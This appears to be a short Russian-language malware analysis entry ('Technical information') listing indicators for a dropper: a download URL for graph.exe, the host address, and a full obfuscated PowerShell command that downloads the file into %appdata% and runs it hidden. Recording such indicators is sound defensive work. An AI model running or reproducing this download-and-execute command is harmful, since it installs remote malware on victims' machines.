Техническая информация
- http://86.##6.131.177/link/graph.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' .EXE /C POWErsHELl.eXE -ex BypaSs -NOP -w HIdDen (NEw-oBjeCT SyStEm.NET.weBCLiENT).dowNloADFILe( 'http://86.##6.131.177/link/GRAPH.EXE' , '%apPDAtA%.exe' ) ; saps '%Appdata%.exe'
- '86.##6.131.177':80